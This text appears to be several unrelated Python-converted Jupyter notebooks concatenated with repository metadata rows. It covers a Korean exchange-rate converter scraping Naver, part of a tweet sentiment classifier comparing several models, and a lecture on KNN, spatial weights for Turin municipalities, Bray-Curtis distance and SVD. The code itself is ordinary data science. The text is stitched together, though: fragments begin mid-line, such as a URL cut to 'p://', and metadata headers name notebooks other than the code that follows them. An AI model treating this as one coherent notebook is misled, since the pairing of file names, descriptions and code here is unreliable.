sns.violinplot(x="replicate_group_name", y="RSD", data=stats_triplicates_example, orient = 'v')
plt.xticks(rotation=70)
plt.title('RSD', size = 20)
# ### Separate the data
# #### You can also separate the data based on for example the 'replicate_group_name' in order to visualize certain parts of it
# Split the data by 'replicate_group_name'. Here we do that only for the first sample in the dataset
samples = list(stats_triplicates_example['replicate_group_name'].unique())
samples
StressTest1_P1Ecoli_10xDil = stats_triplicates_example[stats_triplicates_example['replicate_group_name'] == samples[0]]
sns.violinplot(x="replicate_group_name", y="Mean", data=StressTest1_P1Ecoli_10xDil, orient = 'v')
plt.xticks(rotation=70)
sns.violinplot(x="replicate_group_name", y="RSD", data=StressTest1_P1Ecoli_10xDil, orient = 'v')
plt.xticks(rotation=70)
| 3,121 |
/Tweeter Sentiment analysis (1).ipynb
|
d9a245a2ebdc5604c63c88a042a37630c87baf7f
|
[] |
no_license
|
coderraa/twitter-sentiment-analysis
|
https://github.com/coderraa/twitter-sentiment-analysis
| 1 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 853,513 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + slideshow={"slide_type": "slide"}
#ver 1.0
exchange = float(input('환율을 입력해주세요 : '))
cost = int(input('면세품의 금액을 입력해주세요 : '))
result = exchange * cost
print(int(result),'원 입니다.')
# + slideshow={"slide_type": "slide"}
#ver 2.0
rate = {'usa':1136.6, 'jpn':10.36, 'eu' : 150}
country = input('어느 나라 화폐인가요?(usa, jpn, eu) : ')
exchange = rate[country]
cost = int(input('면세품의 금액을 입력해주세요 : '))
result = exchange * cost
print(int(result),'원 입니다.')
# + slideshow={"slide_type": "slide"}
#for문 활용 프로그램
rate = {'usa':1136.6, 'jpn':10.36, 'eu' : 150}
money = int(input('우리나라 돈으로 얼마인가요? : '))
for key in rate :
print(key+' : ' + str(money / float(rate[key])))
# + slideshow={"slide_type": "slide"}
#for, if문 활용 프로그램
rate = {'usa':1136.6, 'jpn':10.36, 'eu' : 150}
money = int(input('우리나라 돈으로 얼마인가요? : '))
for key in rate :
if(key == 'usa'):
unit = 'dollar'
elif(key == 'jpn'):
unit = 'en'
elif(key == 'eu'):
unit = 'euro'
result = money / rate[key]
print(key+' : ' + str(result) + unit)
# + slideshow={"slide_type": "slide"}
#ver 3.0 초기 프로그램
import urllib.request
from bs4 import BeautifulSoup
soup = BeautifulSoup(urllib.request.urlopen('http://info.finance.naver.com/marketindex/exchangeList.nhn').read())
for i in range(5):
info = soup.find_all('a')[i+1].text
print(info)
currency = soup.find_all('td', attrs={"class":"sale"})[i].text
print(currency)
# + slideshow={"slide_type": "slide"}
#ver 3.0 문자열 부분 수정
import urllib.request
from bs4 import BeautifulSoup
soup = BeautifulSoup(urllib.request.urlopen('http://info.finance.naver.com/marketindex/exchangeList.nhn').read(),"lxml")
rate ={}
for i in range(5):
info = soup.find_all('a')[i+1].text.strip()
currency = soup.find_all('td', attrs={"class":"sale"})[i].text.replace(',', '')
rate[info] = currency
print(rate)
# + slideshow={"slide_type": "slide"}
#ver 3.0
import urllib.request
from bs4 import BeautifulSoup
soup = BeautifulSoup(urllib.request.urlopen('http://info.finance.naver.com/marketindex/exchangeList.nhn').read(),"lxml")
rate ={}
for i in range(5):
info = soup.find_all('a')[i+1].text.strip().split()[1]
currency = soup.find_all('td', attrs={"class":"sale"})[i].text.replace(',', '')
rate[info] = currency
print(rate)
country = input('어느 나라 화폐인가요?')
exchange = float(rate[country])
cost = int(input('상품의 금액을 입력해주세요 : '))
result = exchange * cost
print(int(result),'원 입니다.')
p://clipart-library.com/image_gallery2/Twitter-PNG-Image.png', stream=True).raw))
# We use the ImageColorGenerator library from Wordcloud
# Here we take the color of the image and impose it over our wordcloud
image_colors = ImageColorGenerator(Mask)
# Now we use the WordCloud function from the wordcloud library
wc = WordCloud(background_color='black', height=1500, width=4000,mask=Mask).generate(all_words_negative)
# +
# Size of the image generated
plt.figure(figsize=(10,20))
# Here we recolor the words from the dataset to the image's color
# recolor just recolors the default colors to the image's blue color
# interpolation is used to smooth the image generated
plt.imshow(wc.recolor(color_func=image_colors),interpolation="gaussian")
plt.axis('off')
plt.show()
# -
def Hashtags_Extract(x):
    """Return one list of hashtag names (without the '#') per tweet in *x*.

    Parameters
    ----------
    x : iterable of str
        Tweet texts.

    Returns
    -------
    list of list of str
        For each tweet, the words captured by the pattern ``#(\\w+)``;
        tweets with no hashtags yield an empty list.
    """
    # Comprehension replaces the original append loop; behavior is unchanged.
    return [re.findall(r'#(\w+)', tweet) for tweet in x]
ht_positive = Hashtags_Extract(combine['Tidy_Tweets'][combine['label']==0])
ht_positive
ht_positive_unnest = sum(ht_positive,[])
ht_negative = Hashtags_Extract(combine['Tidy_Tweets'][combine['label']==1])
ht_negative
ht_negative_unnest = sum(ht_negative,[])
word_freq_positive = nltk.FreqDist(ht_positive_unnest)
word_freq_positive
df_positive = pd.DataFrame({'Hashtags':list(word_freq_positive.keys()),'Count':list(word_freq_positive.values())})
df_positive.head(10)
df_positive_plot = df_positive.nlargest(20,columns='Count')
sns.barplot(data=df_positive_plot,y='Hashtags',x='Count')
sns.despine()
word_freq_negative = nltk.FreqDist(ht_negative_unnest)
word_freq_negative
df_negative = pd.DataFrame({'Hashtags':list(word_freq_negative.keys()),'Count':list(word_freq_negative.values())})
df_negative.head(10)
df_negative_plot = df_negative.nlargest(20,columns='Count')
sns.barplot(data=df_negative_plot,y='Hashtags',x='Count')
sns.despine()
from sklearn.feature_extraction.text import CountVectorizer
bow_vectorizer = CountVectorizer(max_df=0.90, min_df=2, max_features=1000, stop_words='english')
# bag-of-words feature matrix
bow = bow_vectorizer.fit_transform(combine['Tidy_Tweets'])
df_bow = pd.DataFrame(bow.todense())
df_bow
from sklearn.feature_extraction.text import TfidfVectorizer
tfidf=TfidfVectorizer(max_df=0.90, min_df=2,max_features=1000,stop_words='english')
tfidf_matrix=tfidf.fit_transform(combine['Tidy_Tweets'])
df_tfidf = pd.DataFrame(tfidf_matrix.todense())
df_tfidf
train_bow = bow[:31962]
train_bow.todense()
train_tfidf_matrix = tfidf_matrix[:31962]
train_tfidf_matrix.todense()
from sklearn.model_selection import train_test_split
x_train_bow, x_valid_bow, y_train_bow, y_valid_bow = train_test_split(train_bow,train['label'],test_size=0.3,random_state=2)
x_train_tfidf, x_valid_tfidf, y_train_tfidf, y_valid_tfidf = train_test_split(train_tfidf_matrix,train['label'],test_size=0.3,random_state=17)
# ---------------------------------------------------------------------------
# Model comparison: Logistic Regression / XGBoost / Decision Tree, each
# trained on Bag-of-Words and TF-IDF features.  The feature matrices
# (x_train_bow, x_valid_bow, x_train_tfidf, ...) and label vectors come
# from earlier cells — presumably 0 = positive tweet, 1 = negative tweet
# (see the threshold comments below); confirm against the data-prep cells.
# Fix: np.int (a plain alias of the builtin int) was deprecated in NumPy
# 1.20 and removed in 1.24; .astype(int) is the drop-in replacement.
# ---------------------------------------------------------------------------
from sklearn.metrics import f1_score
from sklearn.linear_model import LogisticRegression

# --- Logistic Regression on Bag-of-Words features ---
Log_Reg = LogisticRegression(random_state=0,solver='lbfgs')
Log_Reg.fit(x_train_bow,y_train_bow)
prediction_bow = Log_Reg.predict_proba(x_valid_bow)
prediction_bow
# If the predicted probability of class 1 is >= 0.3 then label 1, else 0
# (0 = positive sentiment tweet, 1 = negative sentiment tweet).
prediction_int = prediction_bow[:,1]>=0.3
# converting the boolean mask to integer type
prediction_int = prediction_int.astype(int)
prediction_int
# calculating the F1 score on the validation split
log_bow = f1_score(y_valid_bow, prediction_int)
log_bow

# --- Logistic Regression on TF-IDF features ---
Log_Reg.fit(x_train_tfidf,y_train_tfidf)
prediction_tfidf = Log_Reg.predict_proba(x_valid_tfidf)
prediction_tfidf
# Same 0.3 decision threshold on the class-1 probability as above.
prediction_int = prediction_tfidf[:,1]>=0.3
prediction_int = prediction_int.astype(int)
prediction_int
# calculating f1 score
log_tfidf = f1_score(y_valid_tfidf, prediction_int)
log_tfidf

# --- XGBoost on Bag-of-Words features ---
from xgboost import XGBClassifier
model_bow = XGBClassifier(random_state=22,learning_rate=0.9)
model_bow.fit(x_train_bow, y_train_bow)
xgb = model_bow.predict_proba(x_valid_bow)
xgb
# If the predicted probability of class 1 is >= 0.3 then label 1, else 0.
xgb=xgb[:,1]>=0.3
# converting the results to integer type
xgb_int=xgb.astype(int)
# calculating f1 score
xgb_bow=f1_score(y_valid_bow,xgb_int)
xgb_bow

# --- XGBoost on TF-IDF features ---
model_tfidf = XGBClassifier(random_state=29,learning_rate=0.7)
model_tfidf.fit(x_train_tfidf, y_train_tfidf)
xgb_tfidf=model_tfidf.predict_proba(x_valid_tfidf)
xgb_tfidf
# Same 0.3 threshold.
xgb_tfidf=xgb_tfidf[:,1]>=0.3
# converting the results to integer type
xgb_int_tfidf=xgb_tfidf.astype(int)
# calculating f1 score
score=f1_score(y_valid_tfidf,xgb_int_tfidf)
score

# --- Decision Tree on Bag-of-Words features ---
from sklearn.tree import DecisionTreeClassifier
dct = DecisionTreeClassifier(criterion='entropy', random_state=1)
dct.fit(x_train_bow,y_train_bow)
dct_bow = dct.predict_proba(x_valid_bow)
dct_bow
# Same 0.3 threshold.
dct_bow=dct_bow[:,1]>=0.3
# converting the results to integer type
dct_int_bow=dct_bow.astype(int)
# calculating f1 score
dct_score_bow=f1_score(y_valid_bow,dct_int_bow)
dct_score_bow

# --- Decision Tree on TF-IDF features ---
dct.fit(x_train_tfidf,y_train_tfidf)
dct_tfidf = dct.predict_proba(x_valid_tfidf)
dct_tfidf
# Same 0.3 threshold.
dct_tfidf=dct_tfidf[:,1]>=0.3
# converting the results to integer type
dct_int_tfidf=dct_tfidf.astype(int)
# calculating f1 score
dct_score_tfidf=f1_score(y_valid_tfidf,dct_int_tfidf)
dct_score_tfidf

# --- Compare the three Bag-of-Words models by validation F1 ---
Algo_1 = ['LogisticRegression(Bag-of-Words)','XGBoost(Bag-of-Words)','DecisionTree(Bag-of-Words)']
score_1 = [log_bow,xgb_bow,dct_score_bow]
compare_1 = pd.DataFrame({'Model':Algo_1,'F1_Score':score_1},index=[i for i in range(1,4)])
compare_1.T
plt.figure(figsize=(18,5))
sns.pointplot(x='Model',y='F1_Score',data=compare_1)
plt.title('Bag-of-Words')
plt.xlabel('MODEL')
plt.ylabel('SCORE')
plt.show()

# --- Compare the three TF-IDF models by validation F1 ---
Algo_2 = ['LogisticRegression(TF-IDF)','XGBoost(TF-IDF)','DecisionTree(TF-IDF)']
score_2 = [log_tfidf,score,dct_score_tfidf]
compare_2 = pd.DataFrame({'Model':Algo_2,'F1_Score':score_2},index=[i for i in range(1,4)])
compare_2.T
plt.figure(figsize=(18,5))
sns.pointplot(x='Model',y='F1_Score',data=compare_2)
plt.title('TF-IDF')
plt.xlabel('MODEL')
plt.ylabel('SCORE')
plt.show()

# --- Head-to-head: best family (Logistic Regression) on both feature sets ---
Algo_best = ['LogisticRegression(Bag-of-Words)','LogisticRegression(TF-IDF)']
score_best = [log_bow,log_tfidf]
compare_best = pd.DataFrame({'Model':Algo_best,'F1_Score':score_best},index=[i for i in range(1,3)])
compare_best.T
plt.figure(figsize=(18,5))
sns.pointplot(x='Model',y='F1_Score',data=compare_best)
plt.title('Logistic Regression(Bag-of-Words & TF-IDF)')
plt.xlabel('MODEL')
plt.ylabel('SCORE')
plt.show()

# --- Final predictions on the held-out test rows and submission file ---
# Rows from index 31962 onward of tfidf_matrix are the test split
# (presumably train has 31962 rows — confirm against the data-prep cells).
test_tfidf = tfidf_matrix[31962:]
test_pred = Log_Reg.predict_proba(test_tfidf)
test_pred_int = test_pred[:,1] >= 0.3
test_pred_int = test_pred_int.astype(int)
test['label'] = test_pred_int
submission = test[['id','label']]
submission.to_csv('result.csv', index=False)
res = pd.read_csv('result.csv')
res
# Class balance of the original training labels.
sns.countplot(train_original['label'])
sns.despine()
/task1_char_language_model.ipynb
|
4b72361ac0256fb4e359e42beaeff524490d6658
|
[] |
no_license
|
EgShes/small_pytorch_projects
|
https://github.com/EgShes/small_pytorch_projects
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 33,296 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="7Rxk1tbt8dX6"
# # Lecture7 : Advanced Features
#
# (Author: Simone Azeglio, [email protected])
# + id="QdDA5FJ3FxTT"
import warnings
warnings.filterwarnings('ignore')
# + id="ZZggCAPQbDjD" colab={"base_uri": "https://localhost:8080/", "height": 1000} outputId="a45db10c-7272-485a-a7d4-543873b08582"
# !pip install scikit-bio geopandas libpysal splot pygeos
# + [markdown] id="q2i_mtFufXfW"
# # K-Nearest-Neighbors (KNN)
#
# Intro with sklearn and a quick example
# + id="nzXnUlbDGd_P"
import matplotlib.pyplot as plt
# %matplotlib inline
import pandas as pd
from sklearn import datasets, neighbors
from sklearn.model_selection import cross_val_score, train_test_split
from mlxtend.plotting import plot_decision_regions
# + id="_HlTNPH9BU7f" colab={"base_uri": "https://localhost:8080/", "height": 224} outputId="357f7c61-1258-4316-efec-f50e820cc570"
# !wget https://raw.githubusercontent.com/MLJCUnito/ProjectX2020/master/HowToTackleAMLCompetition/Data/Lecture7/data_ushape.csv
# + id="AV8T3znVDLOJ" colab={"base_uri": "https://localhost:8080/", "height": 204} outputId="6982ab67-a3a1-4a6c-a029-8c6fcac6be83"
# Toy 2-D "U-shape" dataset: columns X, Y (coordinates) and a binary class.
data = pd.read_csv("data_ushape.csv")
data.head()
# + id="syQHcc-2Diyr"
X = data[["X","Y"]].values
y = data["class"].astype(int).values
# + id="UbJn5r7tDodL" colab={"base_uri": "https://localhost:8080/", "height": 68} outputId="c8e53bc0-910d-4fff-a760-f50993a723d7"
# Fit a first KNN classifier with an arbitrary k to visualise its boundary.
k_ex = 5
clf = neighbors.KNeighborsClassifier(n_neighbors=k_ex)
clf.fit(X, y)
# + id="1l1H-2t1Erh-" colab={"base_uri": "https://localhost:8080/", "height": 295} outputId="4c6e2a10-2d10-44f5-bdc5-18c25ed467fc"
# Plotting decision region
plot_decision_regions(X, y, clf=clf, legend=2)
# Adding axes annotations
plt.xlabel("X")
plt.ylabel("Y")
plt.title("Knn with K="+ str(k_ex))
plt.show()
# + id="gto4O_h7Gzzj"
# Hold out 20% of the data for the k-selection experiment below.
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)
# + id="b7RSdwXlFPax"
# creating a list of odd k values for KNN (odd avoids voting ties)
k_list = list(range(1,50,2))
# creating a list of cv scores
cv_scores = []
# perform 10-fold cross validation for each candidate k
for k in k_list:
    knn = neighbors.KNeighborsClassifier(n_neighbors=k)
    scores = cross_val_score(knn, X_train, y_train, cv = 10, scoring = "accuracy")
    cv_scores.append(scores.mean())
# + id="aEpY7RyUHLSU" colab={"base_uri": "https://localhost:8080/", "height": 666} outputId="74980587-bec1-4056-af3d-144abd5336ed"
plt.figure(figsize=(15,10))
plt.title('The optimal number of neighbors', fontsize=20, fontweight='bold')
plt.xlabel('Number of Neighbors K', fontsize=15)
plt.ylabel('Accuracy', fontsize=15)
plt.grid()
plt.plot(k_list, cv_scores)
# + id="zGH3IZvPHoyt" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="da062b28-2195-4c0b-d9e7-ca46ca4b2ca9"
# Best/worst k by mean cross-validated accuracy.
best_k = k_list[cv_scores.index(max(cv_scores))]
worst_k = k_list[cv_scores.index(min(cv_scores))]
print("Optimal number of neighbors: " + str(best_k))
# + id="TtWmOZAkIF3R" colab={"base_uri": "https://localhost:8080/", "height": 320} outputId="cf4dcce3-0cb8-4d4f-c2d6-f78fb5d61fcb"
# Side-by-side decision regions for the best and worst k.
figure, axis = plt.subplots(1,2,
                            subplot_kw = dict(aspect = "equal"),
                            figsize=(12,8))
best_clf = neighbors.KNeighborsClassifier(n_neighbors=best_k)
#Use all your data now !!
best_clf.fit(X, y)
worst_clf = neighbors.KNeighborsClassifier(n_neighbors=worst_k)
worst_clf.fit(X,y)
# Plotting decision region
plot_decision_regions(X, y, clf=best_clf, legend=2, ax = axis[0])
plot_decision_regions(X, y, clf=worst_clf, legend=2, ax = axis[1])
# + [markdown] id="CX3BYeA3K_QA"
# ### A Use Case (KNN in Spatial Weights Matrices and Geo-Data)
# + id="EV3c3xarttT0" colab={"base_uri": "https://localhost:8080/", "height": 204} outputId="6a4da82f-0d89-4d03-8c3e-739981015832"
# !wget https://raw.githubusercontent.com/openpolis/geojson-italy/master/geojson/limits_IT_municipalities.geojson
# + id="yznGdozRufgJ"
import geopandas as gpd
import matplotlib.pyplot as plt
import libpysal.weights as lp
from splot.libpysal import plot_spatial_weights
# + id="wtiFbGyTvp23" colab={"base_uri": "https://localhost:8080/", "height": 479} outputId="e9b0d23d-2cce-47f5-90b0-21c2fc2a3a07"
# Load all Italian municipality polygons, then restrict to the
# municipalities of the province of Turin (region Piemonte).
municip = gpd.read_file("limits_IT_municipalities.geojson")
piemonte_municip = municip[municip.reg_name == "Piemonte"]
torino_prov = piemonte_municip[piemonte_municip.prov_name == "Torino"]
torino_prov.head()
# + id="8oeZGvyBxIV7" colab={"base_uri": "https://localhost:8080/", "height": 282} outputId="493cd4c7-0c13-4ea1-da56-90fb6a847b9b"
torino_prov.plot()
# + id="gNLghubUznBo" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="24c5c9bb-cabe-4e19-e3f3-40ec15bc36bb"
torino_prov.shape
# + id="fPS_w4VdBLGt" colab={"base_uri": "https://localhost:8080/", "height": 35} outputId="8cd8e9ee-ed39-4263-8daa-27003ad85ae3"
import libpysal
libpysal.__version__
# + [markdown] id="b3rmkWjl41FV"
# ### Constructing Adjacency Matrix
# + id="uTkWPgbizng5"
# Queen contiguity: two municipalities are neighbours if their polygons
# share at least one boundary point.
w_queen = lp.Queen.from_dataframe(torino_prov, geom_col= "geometry")
# + id="An6JkNn3ISno" colab={"base_uri": "https://localhost:8080/", "height": 356} outputId="f53cb4a3-f46e-4ce0-d62c-3288d60b1139"
plot_spatial_weights(w_queen, torino_prov)
plt.show()
# + id="jkSlwOcYznjw" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="23a7eee3-1335-4282-fd15-185c7166f3b9"
w_queen.neighbors[4]
# + id="RZLLKOKi8_J2" colab={"base_uri": "https://localhost:8080/", "height": 151} outputId="1dd892eb-b0a9-469b-edb6-459e265230d6"
# 267 is the dataframe index of the city of Torino itself (looked up below).
torino_prov[torino_prov.name == "Torino"]
# + id="s69sBaj439Bm" colab={"base_uri": "https://localhost:8080/", "height": 151} outputId="5c062cd4-af0c-4848-ec91-b30b44511c00"
torino_prov.loc[[267]]
# + id="Yw8Aiha53zpr" colab={"base_uri": "https://localhost:8080/", "height": 1000} outputId="8feaa190-21e1-4510-f3b7-4266f28ba639"
torino_prov.loc[w_queen.neighbors[267]]
# + id="kbeDxKxh35Rt" colab={"base_uri": "https://localhost:8080/", "height": 282} outputId="66d601b9-50bd-4786-e295-0830a258b8d6"
# Torino in red, its queen-contiguity neighbours in blue.
figure, axis = plt.subplots(1,1)
torino_prov.plot(color = "grey", ax = axis)
torino_prov.loc[[267]].plot(color = "r", ax = axis)
torino_prov.loc[w_queen.neighbors[267]].plot(color = "b", ax = axis)
# + [markdown] id="-8bH-7g-4rf_"
#
#
#
# + id="SdCvXP3-znmk"
# Distance-based alternative: each municipality linked to its 5 nearest.
w_knn5 = lp.KNN.from_dataframe(torino_prov, k = 5)
# + id="iWzY4Il6DL7W" colab={"base_uri": "https://localhost:8080/", "height": 626} outputId="28d04334-41c2-46f4-84e1-e991ba86d39c"
figure, axis = plt.subplots(1,1, figsize = (12, 10))
torino_prov.boundary.plot(ax = axis)
w_knn5.plot(torino_prov, edge_kws= dict(color = "blue", alpha = .33), ax = axis)
# + id="pKXYT6fIDXAs" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="68fb76f8-8240-47e4-da7e-e5fe42555229"
# KNN graphs are directed, so many pairs are asymmetric.
len(w_knn5.asymmetries)
# + id="NJZJzK7ADcx-" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="58a5214c-89ce-4254-a5b7-dbbda1bb8b00"
w_knn5.nonzero
# + id="CcbJnC_oDkOD"
w_knn3 = lp.KNN.from_dataframe(torino_prov, k = 3)
# + id="bj1keJ-iKfm9" colab={"base_uri": "https://localhost:8080/", "height": 626} outputId="12eb7161-063a-441b-ffea-7217552db491"
figure, axis = plt.subplots(1,1, figsize = (12, 10))
torino_prov.boundary.plot(ax = axis)
w_knn3.plot(torino_prov, edge_kws= dict(color = "red", alpha = .33), ax = axis)
# + id="fhCyJPthDuaT" colab={"base_uri": "https://localhost:8080/", "height": 626} outputId="f1f8a48a-da9d-44de-aa3f-77f7d08c0593"
# Overlay: KNN-5 edges in blue, KNN-3 edges in red.
figure, axis = plt.subplots(1,1, figsize = (12, 10))
#torino_prov.boundary.plot(ax = axis)
w_knn5.plot(torino_prov, edge_kws= dict(color = "blue", alpha = .33),
            node_kws = dict(marker = "."), ax = axis)
w_knn3.plot(torino_prov, edge_kws=dict(color = "red", alpha = .33 ),
            node_kws = dict(marker ="."), ax =axis)
# + [markdown] id="OLDGzrV0tsWC"
# Note that every link in the KNN-3 graph is also contained in the KNN-5 graph. This is because the three closest observations to any observation are necessarily among its five closest as well.
# + id="crk_waxwLfp1" colab={"base_uri": "https://localhost:8080/", "height": 316} outputId="00a67d71-cbef-46dc-d851-822f3b8b407a"
# Degree distributions: queen contiguity varies, KNN is constant by design.
plt.hist(w_queen.sparse.sum(axis = 1))
# + id="qJQ9_lFPGWFV" colab={"base_uri": "https://localhost:8080/", "height": 316} outputId="0ff89449-58df-4d6a-ad79-d37910650e54"
plt.hist(w_knn5.sparse.sum(axis = 1))
# + id="3k_xOZkSLs8I"
# Symmetrising adds the missing reciprocal links.
w_knn5_symmetric = w_knn5.symmetrize()
# + id="B7G7e1H1LyWR" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="96936dfc-1e9a-4b3c-ba49-80b21fa37312"
w_knn5_symmetric.asymmetries
# + id="4HnKwg2vL6do" colab={"base_uri": "https://localhost:8080/", "height": 316} outputId="0f34b34a-3490-4e3b-ffce-ade7d9fe7fdd"
plt.hist(w_knn5_symmetric.sparse.sum(axis = 1))
# + [markdown] id="Zn_cKiEFMCbn"
# ### Kernel Weights (Bonus)
#
# Kernel weights reflect spatial relationships that decay with distance.
#
#
# + id="oYf81CSqMFK9"
# Default kernel is triangular with a fixed bandwidth.
triangular = lp.Kernel.from_dataframe(torino_prov)
# + id="fqHFU54H5ZN_" colab={"base_uri": "https://localhost:8080/", "height": 612} outputId="9e2ee84a-9d17-4fba-da43-b16f8040157e"
figure, axis = plt.subplots(1,1, figsize = (12, 10))
axis.matshow(triangular.sparse.toarray())
# + id="e-VPxJ4x7bLF" colab={"base_uri": "https://localhost:8080/", "height": 612} outputId="31efdb6d-04d2-4450-bd88-3c4620f0c721"
# A wider bandwidth makes the weights matrix denser.
triangular_10 = lp.Kernel.from_dataframe(torino_prov, bandwidth = 10)
figure, axis = plt.subplots(1,1, figsize = (12, 10))
axis.matshow(triangular_10.sparse.toarray())
# + id="fLuPgoFS7rlV" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="1b4279a7-1a77-4e64-ded4-e8ba18751320"
triangular.bandwidth[0]
# + id="689BvZcd7uLU" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="a255674d-3285-4092-e2e3-740c46a6885d"
triangular_10.bandwidth[0]
# + id="zKOFV6Ys7wmr" colab={"base_uri": "https://localhost:8080/", "height": 316} outputId="6a2d2516-e627-40d7-8e55-a4c21a155168"
# Weights of Torino's row under the two bandwidths, mapped on the province.
figure, axis = plt.subplots(1,2,
                            subplot_kw = dict(aspect = "equal"),
                            figsize=(12,8))
flat_weights = triangular.sparse[267].toarray().flatten()
flat_weights_10 = triangular_10.sparse[267].toarray().flatten()
torino_prov.assign(w = flat_weights).plot("w", ax = axis[0])
torino_prov.assign(w = flat_weights_10).plot("w", ax = axis[1])
# + [markdown] id="7J4H-M7g9S3K"
# We can also adjust the function used to generate the kernel.
# + id="uxNws9tw9lVF" colab={"base_uri": "https://localhost:8080/", "height": 282} outputId="1de13e73-5fb9-4daa-c53b-7ac3674c37e8"
gaussian = lp.Kernel.from_dataframe(torino_prov, function = "gaussian")
flat_weights_g = gaussian.sparse[267].toarray().flatten()
torino_prov.assign(w = flat_weights_g).plot("w")
# + id="4vgPM6NM93OH" colab={"base_uri": "https://localhost:8080/", "height": 612} outputId="360a390c-517a-49b9-d90f-707bb6a4c474"
figure, axis = plt.subplots(1,1, figsize = (12, 10))
axis.matshow(gaussian.sparse.toarray())
# + [markdown] id="lCmISroD9_zS"
# Adaptive bandwidths allow kernels to adjust dynamically
# + id="RMPN21F39_Pq"
# fixed=False: the bandwidth adapts so each observation keeps k neighbours.
gaussian_adaptive = lp.Kernel.from_dataframe(torino_prov, function = "gaussian", k = 40, fixed = False)
# + id="mvMXYfwj-Ojb" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="afea359d-f162-44cf-e83f-ff29f329adad"
gaussian_adaptive.bandwidth[0]
# + id="FMMuTyFr-S8u" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="240bc32c-5da3-4aa3-8222-a16db83164b2"
gaussian_adaptive.bandwidth[1]
# + id="q3KyudGU-V2k" colab={"base_uri": "https://localhost:8080/", "height": 350} outputId="b0eaa7f0-d2b8-4756-8923-0a3eecfb68cd"
plt.hist(gaussian_adaptive.bandwidth.flatten())
# + id="MsD-3q3u-gRm" colab={"base_uri": "https://localhost:8080/", "height": 316} outputId="aa61a45e-4b82-48fc-f3b2-6f353fa18fb5"
# Fixed-bandwidth (left) vs adaptive-bandwidth (right) Gaussian weights.
figure, axis = plt.subplots(1,2, subplot_kw= dict(aspect = "equal"), figsize = (12, 8))
weights_gaussian_adaptive = gaussian_adaptive.sparse[267].toarray().flatten()
torino_prov.assign(w = flat_weights_g).plot("w", ax = axis[0])
torino_prov.assign(w = weights_gaussian_adaptive).plot("w", ax = axis[1])
# + [markdown] id="_UnJGFPYabRC"
# ### A Non-Euclidean Distance: Bray-Curtis
#
# The Bray-Curtis dissimilarity between two count vectors $x$ and $y$ is $\sum_i |x_i - y_i| \,/\, \sum_i (x_i + y_i)$. Unlike the Euclidean distance it is bounded in $[0, 1]$, and it is not a true metric: it violates the triangle inequality, which is why it is called a dissimilarity rather than a distance.
# + id="xTk_pK0KeOOF" colab={"base_uri": "https://localhost:8080/", "height": 204} outputId="2777842a-8ae1-42cd-d2f9-6b0f76082961"
# %matplotlib inline
import numpy as np
import pandas as pd
sample_ids = ['A', 'B', 'C']
feature_ids = ['OTU1', 'OTU2', 'OTU3', 'OTU4', 'OTU5']
data = np.array([[1, 0, 0],
[3, 2, 0],
[0, 0, 6],
[1, 4, 2],
[0, 4, 1]])
table1 = pd.DataFrame(data, index=feature_ids, columns=sample_ids)
table1
# + id="Q-7MECTLbrsn"
#from scipy.spatial.distance import braycurtis
from skbio.stats.distance import DistanceMatrix
# + id="x-tWuDKKdZQ3"
def bray_curtis_distance(table, sample1_id, sample2_id):
    """Compute the Bray-Curtis dissimilarity between two samples.

    Parameters
    ----------
    table : mapping of sample id -> iterable of counts
        Typically a pandas DataFrame with features as rows and sample ids
        as columns (``table[sample_id]`` yields that sample's counts).
    sample1_id, sample2_id : hashable
        Identifiers (column labels) of the two samples to compare.

    Returns
    -------
    float
        ``sum(|x_i - y_i|) / sum(x_i + y_i)`` over all features; 0 means
        identical samples, 1 means no shared features.

    Raises
    ------
    ZeroDivisionError
        If both samples are all zeros (the dissimilarity is undefined).
    """
    sample1_counts = table[sample1_id]
    sample2_counts = table[sample2_id]
    # Idiomatic replacement of the original manual accumulation loop.
    numerator = sum(abs(a - b) for a, b in zip(sample1_counts, sample2_counts))
    denominator = sum(a + b for a, b in zip(sample1_counts, sample2_counts))
    return numerator / denominator
# + id="e4Mkv2V1ej8x"
def df_to_distances(table, pairwise_distance_fn):
    """Build a symmetric skbio DistanceMatrix from a feature table.

    ``pairwise_distance_fn(table, id_a, id_b)`` is evaluated once per
    unordered pair of columns of *table*; the diagonal stays zero.
    """
    ids = table.columns
    n = len(ids)
    matrix = np.zeros((n, n))
    # Fill only the strict lower triangle and mirror it, so each pair
    # is computed exactly once.
    for row in range(n):
        for col in range(row):
            d = pairwise_distance_fn(table, ids[row], ids[col])
            matrix[row, col] = d
            matrix[col, row] = d
    return DistanceMatrix(matrix, ids)
# + id="1k4zP9cre491" colab={"base_uri": "https://localhost:8080/", "height": 349} outputId="be661253-b2dc-47ef-9be5-95719c195d00"
# Pairwise Bray-Curtis distances between the three samples of table1.
df_to_distances(table1, bray_curtis_distance)
# + [markdown] id="S31y3ZpRGxPy"
# # Matrix Factorization Methods: SVD, PCA, NMF
#
# Many complex matrix operations cannot be solved efficiently or with stability using the limited precision of computers.
#
# Matrix factorization are methods that reduce a matrix into constituent parts that make it easier to calculate more complex matrix operations. Matrix factorization methods, also called matrix decomposition methods, are a foundation of linear algebra in computers, even for basic operations such as solving systems of linear equations, calculating the inverse, and calculating the determinant of a matrix.
#
# ## SVD
#
# SVD (Singular Value Decomposition) is one of the above cited methods. Essentially, SVD states that a matrix can be represented as the product of other 3 matrices. Mathematically speaking:
#
# $ A_{nxp} = U_{nxn} S_{nxp} V_{pxp}^T$
#
# where $n$ is the number of samples (i.e. rows), and $p$ is the number of features (i.e. columns).
#
